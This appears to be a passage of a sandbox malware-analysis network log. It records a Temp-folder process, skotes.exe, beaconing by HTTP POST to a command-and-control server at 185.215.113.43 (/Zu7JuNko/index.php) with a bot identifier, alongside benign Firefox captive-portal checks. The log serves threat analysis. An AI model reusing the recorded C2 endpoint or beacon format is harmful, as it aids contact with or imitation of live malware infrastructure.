Dec 16, 2024 11:05:15.782907009 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	50165	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:17.537224054 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:18.876439095 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	50168	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:20.517198086 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:21.871012926 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50170	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:23.643233061 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 16, 2024 11:05:24.986675024 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.5	50177	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:25.305401087 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:26.389153004 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69899 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:26.634747028 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:26.952390909 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69899 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:27.137748957 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:27.453866959 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69900 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:28.035661936 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:28.350682974 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69901 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:29.202867985 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:29.517750025 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69902 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:30.404258013 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:30.719372988 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69903 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:33.378813982 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:33.693604946 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69906 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:43.772598982 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:05:44.783519983 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:45.098275900 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69917 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:55.178262949 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:05:55.411350965 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:55.725996017 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69928 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:55.754475117 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:56.069158077 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69928 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:05:56.840421915 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:05:57.156028986 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69930 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:06:00.354274035 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:06:00.669553995 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69933 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:06:06.167273998 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:06:06.481689930 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69939 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:06:16.531474113 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:06:25.548163891 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:06:25.862380028 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69958 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:06:35.864303112 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:06:46.065082073 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:06:47.653002024 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:06:47.968213081 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 69980 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:06:57.970046997 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:07:08.157690048 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:07:18.376022100 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:07:28.570075989 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:07:38.721518040 CET	6	OUT	Data Raw: 00 Data Ascii:
Dec 16, 2024 11:08:09.455271959 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:08:09.770154953 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 70062 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 16, 2024 11:08:27.191484928 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 16, 2024 11:08:27.615129948 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 15 Dec 2024 14:40:27 GMT Age: 70080 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.5	50190	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:26.515407085 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.5	50191	185.215.113.43	80	5492	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:26.842281103 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 41 32 43 37 39 42 35 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7EBA2C79B55D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Dec 16, 2024 11:05:28.171139956 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 16 Dec 2024 10:05:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.5	50197	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:27.159524918 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.5	50198	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:27.585413933 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.5	50201	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:28.485666037 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Dec 16, 2024 11:05:29.570715904 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Sun, 15 Dec 2024 11:58:44 GMT Age: 79605 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.5	50205	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 11:05:29.643485069 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
